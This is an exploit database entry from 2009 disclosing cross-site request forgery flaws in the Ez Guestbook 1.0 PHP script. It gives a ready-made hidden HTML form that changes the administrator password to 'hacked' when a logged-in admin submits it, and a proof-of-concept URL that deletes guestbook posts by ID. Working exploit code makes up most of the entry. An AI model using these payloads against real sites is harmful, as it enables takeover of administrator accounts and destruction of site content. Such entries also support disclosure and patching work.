Ez Guestbook 1.0 Multiple Vulnerabilities

2009-12-14T00:00:00
ID 1337DAY-ID-10255
Type zdt
Reporter Milos Zivanovic
Modified 2009-12-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================
Ez Guestbook 1.0 Multiple Vulnerabilities
=========================================

[-------------------------------------------------------------------------------------------------]
[   Application: Ez Guestbook
                           ]
[   Version: 1.0
                           ]
[   Link: http://www.scriptsez.net/?action=details&cat=Guestbooks&id=11873094083
                 ]
[   Price: 10 USD
                           ]
[   Vulnerability: Cross Site Request Forgery
                           ]
[-------------------------------------------------------------------------------------------------]
 
Ez Guestbook script version 1.0 suffers from multiple vulnerabilities:
 
[#]Content
 |--Change admin password
 |--Remove post by ID
 
[*]Change admin password
 
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ez_gb/admin.php?action=change_password"
method="post">
  <input type="hidden" name="admin_password" value="hacked">
  <input type="hidden" name="c_admin_password" value="hacked">
  <input type="hidden" name="add" value="true">
  <input type="submit" name="submit" value=" CHANGE ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
 
[+]Remove post by ID
 
[POC----------------------------------------------------------------------------------------------]
http://localhost/ez_gb/admin.php?action=view&do=delete&id=[ID]
[POC----------------------------------------------------------------------------------------------]



#  0day.today [2018-04-14]  #